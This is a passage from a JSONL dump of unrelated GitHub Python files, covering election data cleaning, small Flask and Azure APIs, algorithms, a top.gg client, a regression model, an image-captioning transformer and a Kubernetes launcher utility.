OR', 'JOSEPHINE OR',\n 'LANE OR', 'LINN OR', 'UNION OR']))].copy()\n\n# In[11]:\n\n\n# Final step: Remove all trailing white space and put columns in correct order. \ndf=df.applymap(lambda x: x.strip() if type(x)==str else x)\n\ndf=df[[\"precinct\", \"office\", \"party_detailed\", \"party_simplified\", \"mode\", \"votes\", \"county_name\", \"county_fips\", \"jurisdiction_name\",\n \"jurisdiction_fips\", \"candidate\", \"district\", \"dataverse\", \"year\", \"stage\", \"state\", \"special\", \"writein\", \"state_po\",\n \"state_fips\", \"state_cen\", \"state_ic\", \"date\", \"readme_check\", \"magnitude\"]]\n\ndf.to_csv('2018-or-precinct-general-updated.csv',quoting=csv.QUOTE_NONNUMERIC, index=False)\n\n\n\n","repo_name":"MEDSL/replication-scripts","sub_path":"or2018.py","file_name":"or2018.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5417971114","text":"from flask import Flask, request, jsonify\nimport json\n\napp = Flask(__name__)\n\ntables = []\nrelationships = []\n\nclass Table:\n def __init__(self, name):\n self.name = name\n self.attributes = []\n\nclass Relationship:\n def __init__(self, table1, degree1, table2, degree2, text):\n self.table1 = table1\n self.degree1 = degree1\n self.table2 = table2\n self.degree2 = degree2\n self.text = text\n\n@app.route('/tables', methods=['POST'])\ndef add_table():\n data = request.get_json()\n table_name = data['name']\n table = Table(table_name)\n tables.append(table)\n return jsonify({\"message\": f\"Table {table_name} added successfully.\"}), 201\n\n@app.route('/tables', methods=['GET'])\ndef get_tables():\n table_names = [table.name for table in tables]\n return jsonify(table_names), 200\n\n@app.route('/attributes', methods=['POST'])\ndef add_attribute():\n data = request.get_json()\n table_name = data['table']\n attribute_name = data['name']\n attribute_type = data['type']\n\n table = next((table for table in tables if table.name == table_name), None)\n if table:\n table.attributes.append({\"name\": attribute_name, \"type\": attribute_type})\n return jsonify({\"message\": f\"Attribute {attribute_name} added to table {table_name} successfully.\"}), 201\n else:\n return jsonify({\"error\": f\"Table {table_name} not found.\"}), 404\n\n@app.route('/relationships', methods=['POST'])\ndef add_relationship():\n data = request.get_json()\n table1 = data['table1']\n degree1 = data['degree1']\n table2 = data['table2']\n degree2 = data['degree2']\n text = data['text']\n\n relationship = Relationship(table1, degree1, table2, degree2, text)\n relationships.append(relationship)\n return jsonify({\"message\": \"Relationship added successfully.\"}), 201\n\n@app.route('/code', methods=['GET'])\ndef generate_mermaid_code():\n mermaid_code = \"erDiagram\\n\"\n for table in tables:\n mermaid_code += f\"{table.name} {{\\n\"\n for attr in table.attributes:\n mermaid_code += f\" {attr['name']} {attr['type']}\\n\"\n mermaid_code += \"}\\n\"\n for relationship in relationships:\n mermaid_code += f\"{relationship.table1} {relationship.degree1}--{relationship.degree2} {relationship.table2} : {relationship.text}\\n\"\n\n return jsonify({\"code\": mermaid_code}), 200\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"acairon/MycVProyect","sub_path":"Proyectos/Crear_mermaid/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35990022719","text":"import json\nimport pandas as pd\n\ndef analysis(file,user_id):\n if(file and user_id):\n df = pd.read_json(file)\n times = 0\n minutes = 0\n minutes = df[df['user_id']==user_id]['minutes'].sum()\n times = df[df['user_id']==user_id]['user_id'].count()\n return times,minutes\n else:\n return 0\n\nif '__name__' == '__main__':\n data = analysis('/home/Code/user_study.json',199071)\n print('haha')\n print(data)\n","repo_name":"ljt1469/shiyanlou-001","sub_path":"analysis-challenge13.py","file_name":"analysis-challenge13.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13552221757","text":"import logging\r\n\r\nimport azure.functions as func\r\nimport uuid\r\nfrom datetime import datetime\r\nimport json\r\n\r\n\r\ndef main(req: func.HttpRequest, doc: func.Out[func.Document]) -> func.HttpResponse:\r\n logging.info('Python HTTP trigger function processed a request.')\r\n\r\n try:\r\n req_body = req.get_json()\r\n if 'productId' not in req_body:\r\n logging.error('Missing productId')\r\n return func.HttpResponse(f\"Missing productId\", status_code=400)\r\n if 'userId' not in req_body:\r\n logging.error('Missing userId')\r\n return func.HttpResponse(f\"Missing userId\", status_code=400)\r\n if 'rating' not in req_body:\r\n logging.error('Missing rating')\r\n return func.HttpResponse(f\"Missing rating\", status_code=400)\r\n if isinstance(req_body['rating'], int) is False:\r\n logging.error('Rating is not numeric')\r\n return func.HttpResponse(f\"Rating is not numeric\", status_code=400)\r\n if req_body['rating'] < 0 or req_body['rating'] > 5:\r\n logging.error('Rating out of range')\r\n return func.HttpResponse(f\"Rating out of range\", status_code=400)\r\n except ValueError:\r\n return func.HttpResponse(f\"Invalid entry\", status_code=500)\r\n\r\n data = {}\r\n for val in ['productId', 'userId', 'rating', 'locationName', 'userNotes']:\r\n if val in req_body:\r\n data[val] = req_body[val]\r\n else:\r\n data[val] = \"\"\r\n \r\n data['id'] = str(uuid.uuid4())\r\n data['timestamp'] = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%SZ\")\r\n doc.set(func.Document.from_dict(data))\r\n \r\n return func.HttpResponse(\r\n json.dumps(data),\r\n status_code=200\r\n )\r\n","repo_name":"sajitsasi/serverless-openhack","sub_path":"CreateRating/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31963127688","text":"import collections\n\nclass PartitionRefinement2(object):\n def __init__(self, initial_sets):\n self.sets = list(initial_sets)\n # Map each element to its index in the sets table\n self.si_map = {}\n for i, s in enumerate(self.sets):\n for x in s:\n self.si_map[x] = i\n\n def split(self, s):\n splitmap = {}\n for x in s:\n old_si = self.si_map[x]\n if old_si not in splitmap:\n splitmap[old_si] = len(self.sets)\n self.sets.append(set())\n new_si = splitmap[old_si]\n\n self.sets[old_si].remove(x)\n self.sets[new_si].add(x)\n self.si_map[x] = new_si\n\n res = []\n for old_si, new_si in splitmap.items():\n if not self.sets[new_si]:\n continue\n if not self.sets[old_si]:\n # We \"split\" the entire set into new set - move it back\n self.sets[new_si], self.sets[old_si] = self.sets[old_si], self.sets[new_si]\n for x in self.sets[old_si]:\n self.si_map[x] = old_si\n continue\n res.append((old_si, new_si))\n\n while not self.sets[-1]:\n self.sets.pop()\n return res\n\n def debug(self):\n return sorted(sorted(s) for s in self.sets if s)\n\ndef simplify(initial_sets, edges):\n rev_edges = {k: collections.defaultdict(list) for k in edges}\n for k, v in edges.items():\n for tok, k2 in v.items():\n rev_edges[k2][tok].append(k)\n\n\n partitions = PartitionRefinement2(initial_sets)\n workset = set(range(len(initial_sets)))\n\n # for k in (38, 52):\n # k = 'State', k\n # si = partitions.si_map[k]\n # print 'initial set for', k\n # print si, partitions.sets[si]\n\n # v1 = 'State', 38\n # v2 = 'State', 52\n # hassplit = False\n\n while workset:\n si = workset.pop()\n\n predecessors = collections.defaultdict(set)\n for x in partitions.sets[si]:\n for tok, preds in rev_edges[x].items():\n predecessors[tok].update(preds)\n\n for tok, preds in predecessors.items():\n split_pairs = partitions.split(preds)\n # if not hassplit and partitions.si_map[v1] != partitions.si_map[v2]:\n # print 'Split!', partitions.si_map[v1], partitions.si_map[v2]\n # hassplit = True\n # print 'split from', tok, preds\n\n\n for i1, i2 in split_pairs:\n set1 = partitions.sets[i1]\n set2 = partitions.sets[i2]\n # if (52 in set1 and 38 in set2) or (38 in set1 and 52 in set2):\n # print 'split', set1, set2\n\n if i1 in workset:\n workset.add(i2)\n else:\n # choose the smaller of the two new sets to add to the work list\n workset.add(min((i1, i2), key=lambda i:len(partitions.sets[i])))\n return partitions.sets\n","repo_name":"Storyyeller/ankou","sub_path":"hopcroft.py","file_name":"hopcroft.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"71190624534","text":"# 평문을 암호로 바꿨을때(대문자 1~26 소문자 27~52) 암호문과 일치하는지를 물어보는 문제\n# 암호문은 순서를 섞어놓았다는 점에 주의\n# 값의 범위가 넓다 따라서 빠른 입출력을 사용하자\n# 대문자 65~90 소문자 97~122\n# 대문자 1~26 소문자 27~52\nimport sys\n\nn = int(input())\ncode = sorted(map(int, sys.stdin.readline().rstrip().split())) # 암호문\nclear_text = input() # 평문\ndef change(m):\n c = ord(m)\n if 65 <= c <= 90:\n c -= 64\n elif 97 <= c <= 122:\n c -= 70\n else:\n c = 0\n return c\n\n\narray = sorted([change(i) for i in clear_text])\nfor i in range(n):\n if code[i] != array[i]:\n print(\"n\")\n break\nelse:\n print(\"y\")","repo_name":"magnificentLee/Study","sub_path":"알고리즘/구현/101~150/141.암호해독기.py","file_name":"141.암호해독기.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16852959363","text":"import aiohttp\nimport asyncio\nfrom typing import Union, Sequence, List\n\nfrom .api import Api\nfrom .models import Bot, Search, Stats, VotedUser, User, Vote\nfrom .enums import WidgetType\nfrom .widget import Widget\n\n\nclass HttpClient:\n \"\"\" Top.gg의 Http 클라이언트를 선언합니다.\n 이 클래스를 통하여 top.gg API에 연결됩니다.\n\n Parameters\n ----------\n token: Optional[str]\n Top.gg 에서 발급받은 봇의 토큰 키값 입니다. 데이터를 반영하거나 불러올 때 토큰 값이 사용됩니다.\n session: Optional[aiohttp.ClientSession]\n HttpClient 를 위한 aiohttp 의 ClientSession 클래스 입니다.\n 기본값은 None이며, 자동으로 ClientSession을 생성하게 됩니다.\n loop: Optional[asyncio.AbstractEventLoop]\n 비동기를 사용하기 위한 asyncio.AbstractEventLoop 입니다.\n 기본값은 None 입니다.\n 기본 asyncio.AbstractEventLoop는 asyncio.get_event_loop()를 사용하여 얻습니다.\n \"\"\"\n def __init__(self, token: str = None,\n session: aiohttp.ClientSession = None,\n loop: asyncio.AbstractEventLoop = None):\n self.token = token\n self.requests = Api(token=token, session=session, loop=loop)\n self.session = session\n\n async def bot(self, bot_id: int) -> Bot:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 봇 정보를 불러옵니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n\n Returns\n -------\n Bot:\n Top.gg로 부터 들어온 봇 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/bots/{bot_id}\".format(bot_id=bot_id)\n\n result = await self.requests.get(path=path)\n return Bot(result)\n\n async def search(self,\n sort: str = None,\n search=None,\n fields: Sequence[str] = \"\",\n limit: int = 50,\n offset: int = 0) -> Search:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n Top.gg에서 봇을 검색합니다.\n\n Parameters\n ----------\n sort: Optional[str]\n 정렬이 되는 기준이 포함됩니다.\n search: Optional[Dict[int]]\n 검색할 디스코드 봇의 이름이 포함됩니다.\n fields: Sequence[str]\n 표시할 쉼표로 구분된 필드 목록입니다. search 값에 \",\"로 구분을 할 경우 해당 값이 사용됩니다.\n limit: Optional[int]\n 불러올 봇의 양의 갯수가 포함됩니다. 기본 값은 50개입니다. 최댓 값은 500개 입니다.\n offset: Optional[int]\n 건너 뛸 디스코드 봇의 갯수가 포함됩니다. 기본 값은 0입니다.\n\n Returns\n -------\n Search:\n Top.gg로 부터 들어온 봇 정보가 포함되어 있습니다.\n \"\"\"\n if search is None:\n search = {}\n\n limit = min(limit, 500)\n fields = \", \".join(fields)\n search = \" \".join([f\"{field}: {value}\" for field, value in search.items()])\n\n data = {\n \"limit\": limit,\n \"offset\": offset,\n \"search\": search,\n \"fields\": fields,\n \"sort\": sort\n }\n path = \"/search\"\n\n result = await self.requests.get(path=path, query=data)\n return Search(result)\n\n async def vote(self, bot_id: int, user_id: int) -> Vote:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n `user_id`에 들어있는 사용자가 봇에 투표를 누른 여부에 대하여 불러옵니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n user_id: int\n 유저 ID 값이 포함되어 있습니다.\n\n Returns\n -------\n Vote:\n Top.gg로 부터 들어온 사용자 투표 정보에 대한 정보가 포함되어 있습니다.\n \"\"\"\n data = {\n \"userId\": str(user_id)\n }\n path = \"/bots/{bot_id}/check\".format(bot_id=bot_id)\n result = await self.requests.get(path=path, query=data)\n return Vote(result)\n\n async def votes(self, bot_id: int) -> List[VotedUser]:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 투표를 누른 사용자 목록을 모두 불러옵니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n\n Returns\n -------\n List[User]:\n Top.gg로 부터 투표 누른 사용자 목록에 대한 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/bots/{bot_id}/votes\".format(bot_id=bot_id)\n result = await self.requests.get(path=path)\n return [VotedUser(user) for user in result]\n\n async def stats(self, bot_id: int,\n guild_count: Union[int, list] = None,\n shard_id: int = None,\n shard_count: int = None) -> Stats:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 봇 정보를 수신하거나 발신합니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n guild_count: Optional[Union[int, list]]\n 서버 갯수가 포함되어 있습니다.\n shard_id: Optional[int]\n (Shard를 사용할 때만 해당됩니다.) 샤드의 ID 값이 포함됩니다.\n shard_count: Optional[int]\n (Shard를 사용할 때만 해당됩니다.) 샤드의 갯수가 포함됩니다.\n\n Returns\n -------\n Stats:\n Top.gg로 부터 들어온 봇 상태 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/bots/{bot_id}/stats\".format(bot_id=bot_id)\n\n if guild_count is not None:\n data = {\n \"server_count\": guild_count,\n \"shard_id\": shard_id,\n \"shard_count\": shard_count\n }\n result = await self.requests.post(path=path, json=data)\n else:\n result = await self.requests.get(path=path)\n return Stats(result)\n\n async def users(self, user_id: int) -> User:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 사용자 정보를 불러옵니다.\n\n Parameters\n ----------\n user_id: int\n 사용자 ID 값이 포함됩니다.\n\n Returns\n -------\n User\n Top.gg로 부터 들어온 사용자 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/users/{user_id}\".format(user_id=user_id)\n\n self.requests.version = 2\n result = await self.requests.get(path=path)\n return User(result)\n\n def widget(self, bot_id: int, widget_type: WidgetType = None) -> Widget:\n \"\"\"\n Top.gg를 통하여 디스코드 봇의 위젯 값을 불러옵니다.\n\n Parameters\n ----------\n widget_type: WidgetType\n 위젯 유형값이 포함됩니다.\n bot_id: int\n 위젯에 사용되는 디스코드 봇 ID가 포함됩니다.\n\n Returns\n -------\n Widget:\n Top.gg의 위젯이 들어간 Assets 값이 리턴됩니다.\n \"\"\"\n query = dict()\n if isinstance(widget_type, WidgetType):\n widget_t = widget_type.value\n else:\n widget_t = widget_type\n\n if widget_type is None:\n path = \"/widget/{widget_type}/{bot_id}\".format(widget_type=widget_t, bot_id=bot_id)\n else:\n path = \"/widget/{bot_id}\".format(widget_type=widget_t, bot_id=bot_id)\n return Widget(path=path, query=query, session=self.session)\n","repo_name":"gunyu1019/DBSkr-py","sub_path":"DBSkr/topgg/https.py","file_name":"https.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"ko","doc_type":"code","stars":8,"dataset":"github-code","pt":"67"} +{"seq_id":"10515795353","text":"import pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_absolute_error\n\n# 从csv文件中读取数据集\ndata = pd.read_csv('xablzufang.csv', encoding='utf-8-sig')\ncol = ['type', 'bc', 'distance', 'rent_area', 'rent_price']\ndata = pd.DataFrame(data, columns=col)\n\n# 将\"None\"替换为\"100000000\",并将距离转换为数字类型\ndata[\"distance\"] = data[\"distance\"].replace(\"None\", \"100000000\")\ndata[\"distance\"] = data[\"distance\"].str.replace(\"m\", \"\").astype(float)\n\n# 将rent_area列的值缩放到0到1的范围内\ndata[\"rent_area\"] = data[\"rent_area\"] / 5000.0\n\n# 使用OneHotEncoder将类型和区域编码为二进制形式\nencoder = OneHotEncoder(sparse=False)\ndata_encoded = pd.DataFrame(encoder.fit_transform(data[[\"type\", \"bc\"]]))\ndata_encoded.columns = encoder.get_feature_names([\"type\", \"bc\"])\ndata = pd.concat([data, data_encoded], axis=1)\n\n# 删除原始的\"type\"和\"bc\"列\ndata = data.drop([\"type\", \"bc\"], axis=1)\n\n# 将数据集拆分为训练集和测试集\ntrain_data, test_data = train_test_split(data, test_size=0.2)\n\n# 训练线性回归模型\nmodel = LinearRegression()\nmodel.fit(train_data.drop(\"rent_price\", axis=1), train_data[\"rent_price\"])\n\n# 对测试集进行预测,并计算MAE\npredictions = model.predict(test_data.drop(\"rent_price\", axis=1))\nmae = mean_absolute_error(test_data[\"rent_price\"], predictions)\nprint(\"MAE:\", mae)\n","repo_name":"Gummim10/Example-of-Learning-Data-Mining-with-Python","sub_path":"2-RentalHousingData/model1_ljxa.py","file_name":"model1_ljxa.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16782379000","text":"\"\"\"\nGiven a binary tree, populate an array to repre its level-by-level traversal. You should populate the values of all nodes of\neach level from left to right in separate subarrays.\n\n\"\"\"\n\nclass Tree:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\ndef levelTraversal(root):\n queue = [root]\n visited = [root]\n res = []\n\n while queue:\n currentLevel = []\n level_Size = len(queue)\n \n\n for _ in range(level_Size):\n current = queue.pop(0)\n currentLevel.append(current.val)\n # print(current.val)\n\n\n if current.left:\n queue.append(current.left)\n visited.append(current.left)\n if current.right:\n queue.append(current.right)\n visited.append(current.right)\n res.append(currentLevel)\n return res\n\nnewTree = Tree(1)\nnewTree.left = Tree(2)\nnewTree.right = Tree(3)\nnewTree.left.left = Tree(4)\nnewTree.left.right = Tree(5)\nnewTree.right.right = Tree(7)\nnewTree.right.left = Tree(6)\n\n\nprint(levelTraversal(newTree))\n\n \n\n\n\n","repo_name":"samadon1/DSA-Practice","sub_path":"Breadth_first_search/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27525781700","text":"def insertionSort(alist):\r\n for i in range(1, len(alist)): \r\n key = alist[i] \r\n j = i-1\r\n while j >= 0 and key < alist[j]: \r\n alist[j + 1] = alist[j] \r\n j -= 1\r\n alist[j + 1] = key \r\n\r\nif __name__ == '__main__':\r\n\tA = [2, 6, 1, 3 , 0]\r\n\tinsertionSort(A)\r\n\tprint(A)\r\n","repo_name":"rbdiwash/-CE-III_Roll-No-42_Lab1-2-3","sub_path":"insertionsort_lab2.py","file_name":"insertionsort_lab2.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19382820828","text":"def solution(numbers, hand):\n\n answer = ''\n left_x, left_y = (3,0)\n right_x, right_y = (3,2)\n\n table = {1: (0,0), 2: (0,1), 3: (0,2),\n 4: (1,0), 5: (1,1), 6: (1,2),\n 7: (2,0), 8: (2,1), 9:(2,2),\n 0: (3,1)}\n\n for i in numbers:\n if i in[1,4,7]:\n answer += \"L\"\n left_x,left_y = table[i]\n elif i in [3,6,9]:\n answer += \"R\"\n right_x,right_y=table[i]\n\n #중앙에 있는 버튼일 경우 3가지로 조건으로 나뉜다.\n else:\n current_x,current_y=table[i]\n left = abs(current_x - left_x) + abs(current_y - left_y)\n right = abs(current_x - right_x) + abs(current_y - right_y)\n\n # 1.오른쪽의 거리가 더 가까울 경우\n if left> right:\n answer += \"R\"\n right_x, right_y = current_x, current_y\n\n # 2.왼족의 거리가 더 가까울 경우\n elif left= j, dtype=\"int32\")\n mask = tf.reshape(mask, (1, input_shape[1], input_shape[1]))\n mult = tf.concat(\n [tf.expand_dims(batch_size, -1), tf.constant([1, 1], dtype=tf.int32)],\n axis=0,\n )\n return tf.tile(mask, mult)\n\n\nclass ImageCaptioningModel(keras.Model):\n def __init__(\n self,\n cnn_model,\n embed_dim,\n ff_dim,\n num_heads,\n key_dim,\n value_dim,\n seq_length,\n vocab_size,\n ):\n super().__init__()\n self.cnn_model = get_cnn_model(cnn_model)\n self.embed_dim = embed_dim\n self.ff_dim = ff_dim\n self.num_heads = num_heads\n self.key_dim = key_dim\n self.value_dim = value_dim\n self.seq_length = seq_length\n self.vocab_size = vocab_size\n self.encoder = Encoder(\n embed_dim,\n ff_dim,\n num_heads,\n key_dim,\n value_dim,\n )\n self.decoder = Decoder(\n embed_dim, ff_dim, num_heads, vocab_size, key_dim, value_dim, seq_length\n )\n\n self.loss_tracker = keras.metrics.Mean(name=\"loss\")\n self.acc_tracker = keras.metrics.Mean(name=\"accuracy\")\n self.num_captions_per_image = 5\n\n def call(self, inputs):\n enc_input = self.cnn_model(inputs[0])\n # print('\\n\\nENC_INPUT', enc_input) # (None, 64, 2048)\n enc_output = self.encoder(enc_input, False)\n # print('\\n\\nENC_INPUT', enc_input) # (None, 64, 2048)\n dec_output = self.decoder(inputs[2], enc_output, training=inputs[1], mask=None)\n # print('\\n\\nENC_INPUT', enc_input) # (None, 64, 2048)\n return dec_output\n\n def calculate_loss(self, y_true, y_pred, mask):\n loss = self.loss(y_true, y_pred)\n mask = tf.cast(mask, dtype=loss.dtype)\n loss *= mask\n return tf.reduce_sum(loss) / tf.reduce_sum(mask)\n\n def calculate_accuracy(self, y_true, y_pred, mask):\n accuracy = tf.equal(y_true, tf.argmax(y_pred, axis=2))\n accuracy = tf.math.logical_and(mask, accuracy)\n accuracy = tf.cast(accuracy, dtype=tf.float32)\n mask = tf.cast(mask, dtype=tf.float32)\n return tf.reduce_sum(accuracy) / tf.reduce_sum(mask)\n\n def train_step(self, batch_data):\n batch_img, batch_seq = batch_data\n batch_loss = 0\n batch_acc = 0\n\n # 1. Get image embeddings\n img_embed = self.cnn_model(batch_img)\n\n # 2. Pass each of the five captions one by one to the decoder\n # along with the encoder outputs and compute the loss as well as accuracy\n # for each caption.\n for i in range(self.num_captions_per_image):\n with tf.GradientTape() as tape:\n # 3. Pass image embeddings to encoder\n encoder_out = self.encoder(img_embed, training=True)\n\n batch_seq_inp = batch_seq[:, i, :-1]\n batch_seq_true = batch_seq[:, i, 1:]\n\n # 4. Compute the mask for the input sequence\n mask = tf.math.not_equal(batch_seq_inp, 0)\n\n # 5. Pass the encoder outputs, sequence inputs along with\n # mask to the decoder\n batch_seq_pred = self.decoder(\n batch_seq_inp, encoder_out, training=True, mask=mask\n )\n\n # 6. Calculate loss and accuracy\n caption_loss = self.calculate_loss(batch_seq_true, batch_seq_pred, mask)\n caption_acc = self.calculate_accuracy(\n batch_seq_true, batch_seq_pred, mask\n )\n\n # 7. Update the batch loss and batch accuracy\n batch_loss += caption_loss\n batch_acc += caption_acc\n\n # 8. Get the list of all the trainable weights\n train_vars = (\n self.encoder.trainable_variables + self.decoder.trainable_variables\n )\n\n # 9. Get the gradients\n grads = tape.gradient(caption_loss, train_vars)\n\n # 10. Update the trainable weights\n self.optimizer.apply_gradients(zip(grads, train_vars))\n\n loss = batch_loss\n acc = batch_acc / float(self.num_captions_per_image)\n\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n def test_step(self, batch_data):\n batch_img, batch_seq = batch_data\n batch_loss = 0\n batch_acc = 0\n\n # 1. Get image embeddings\n img_embed = self.cnn_model(batch_img)\n\n # 2. Pass each of the five captions one by one to the decoder\n # along with the encoder outputs and compute the loss as well as accuracy\n # for each caption.\n for i in range(self.num_captions_per_image):\n # 3. Pass image embeddings to encoder\n encoder_out = self.encoder(img_embed, training=False)\n\n batch_seq_inp = batch_seq[:, i, :-1]\n batch_seq_true = batch_seq[:, i, 1:]\n\n # 4. Compute the mask for the input sequence\n mask = tf.math.not_equal(batch_seq_inp, 0)\n\n # 5. Pass the encoder outputs, sequence inputs along with\n # mask to the decoder\n batch_seq_pred = self.decoder(\n batch_seq_inp, encoder_out, training=False, mask=mask\n )\n\n # 6. Calculate loss and accuracy\n caption_loss = self.calculate_loss(batch_seq_true, batch_seq_pred, mask)\n caption_acc = self.calculate_accuracy(batch_seq_true, batch_seq_pred, mask)\n\n # 7. Update the batch loss and batch accuracy\n batch_loss += caption_loss\n batch_acc += caption_acc\n\n loss = batch_loss\n acc = batch_acc / float(self.num_captions_per_image)\n\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n @property\n def metrics(self):\n return [self.loss_tracker, self.acc_tracker]\n","repo_name":"raphaeldiscky/image-captioning-transformer","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35672382210","text":"from flask import Flask\nfrom flask_cors import CORS, cross_origin\n\napi = Flask(__name__)\ncors = CORS(api)\napi.config['CORS_HEADERS'] = 'Content-Type'\n\n@api.route('/profile')\n@cross_origin()\ndef my_profile():\n response_body = {\n \"name\": \"Roger\",\n \"about\" :\"Hello! I'm a full stack developer that loves python and javascript\"\n }\n return response_body\nif __name__ == \"__main__\":\n api.run(ssl_context=('cert.pem', 'key.pem'))","repo_name":"rogerkeithi/DesignPatterns","sub_path":"backend/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"33046673279","text":"mujeres = 0\nvarones = 0\nmayores_edad = 0\nmenores_edad = 0\n\nfor i in range(15):\n edad = int(input(\"Ingrese la edad de la persona: \"))\n sexo = input(\"Ingrese el sexo de la persona (M/F): \")\n\n if sexo == \"F\":\n mujeres += 1\n elif sexo == \"M\":\n varones += 1\n\n if edad >= 18:\n mayores_edad += 1\n else:\n menores_edad += 1\n\nprint(\"Cantidad de mujeres:\", mujeres)\nprint(\"Cantidad de varones:\", varones)\nprint(\"Cantidad de personas mayores de edad:\", mayores_edad)\nprint(\"Cantidad de personas menores de edad:\", menores_edad)\n","repo_name":"JuanPSuarez/TSCDIA-Programacion-1","sub_path":"5/Ejercicio_3.py","file_name":"Ejercicio_3.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25506737709","text":"contato = {'Nome':'Wallace','Telefone':'991877123','Email':'wallacenevesk9@outlook.com',\n'Endereco':'Rua Rosa Muller'}\n\n\ndef get(dic,key, valor=None):\n if key in dic:\n return dic[key]\n else:\n return valor\n\nprint(get(contato,'Nome'))\nprint(get(contato,'Telefone'))\n\n","repo_name":"21seya/ExerciciosBasicoPython","sub_path":"aula114.py","file_name":"aula114.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25183354047","text":"import webbrowser\n\nimport click\nfrom kubernetes import config\nfrom kubernetes.client import configuration\n\nfrom util.spinner import spinner\nfrom util.network import wait_for_connection\nfrom util.logger import initialize_logger\nfrom util.system import wait_for_ctrl_c\nfrom util.app_names import NAUTAAppNames\nfrom util.k8s.k8s_proxy_context_manager import K8sProxy\nfrom util.exceptions import K8sProxyOpenError, K8sProxyCloseError, LocalPortOccupiedError, LaunchError, \\\n ProxyClosingError\nfrom cli_text_consts import UtilLauncherTexts as Texts\n\nlogger = initialize_logger(__name__)\n\nFORWARDED_URL = 'http://localhost:{}{}'\n\n\ndef is_gui_browser_available() -> bool:\n try:\n browser = webbrowser.get()\n return True if type(browser) not in {webbrowser.GenericBrowser, None} else False\n except webbrowser.Error:\n logger.exception('Failed to get webbrowser.')\n return False\n\n\ndef launch_app(k8s_app_name: NAUTAAppNames, no_launch: bool = False, port: int = None, app_name: str = None,\n number_of_retries: int = 0, url_end: str = \"\", namespace: str = None):\n try:\n with spinner(text=Texts.LAUNCHING_APP_MSG) as proxy_spinner, \\\n K8sProxy(nauta_app_name=k8s_app_name, port=port, app_name=app_name,\n number_of_retries=number_of_retries, namespace=namespace) as proxy:\n url = FORWARDED_URL.format(proxy.tunnel_port, url_end)\n\n if k8s_app_name == NAUTAAppNames.INGRESS:\n config.load_kube_config()\n user_token = configuration.Configuration().api_key.get('authorization')\n prepared_user_token = user_token.replace('Bearer ', '')\n url = f'{url}?token={prepared_user_token}'\n\n if not no_launch:\n\n if is_gui_browser_available():\n wait_for_connection(url)\n webbrowser.open_new(url)\n proxy_spinner.stop()\n else:\n click.echo(Texts.NO_WEB_BROWSER_ERROR_MSG)\n\n if port and port != proxy.tunnel_port:\n click.echo(Texts.CANNOT_USE_PORT.format(\n required_port=port,\n random_port=proxy.tunnel_port\n ))\n\n proxy_spinner.stop()\n click.echo(Texts.GO_TO_MSG.format(url=url))\n click.echo(Texts.PROXY_CREATED_MSG)\n wait_for_ctrl_c()\n except K8sProxyCloseError:\n err_message = Texts.PROXY_CLOSE_ERROR_MSG.format(app_name=k8s_app_name)\n raise ProxyClosingError(err_message)\n except 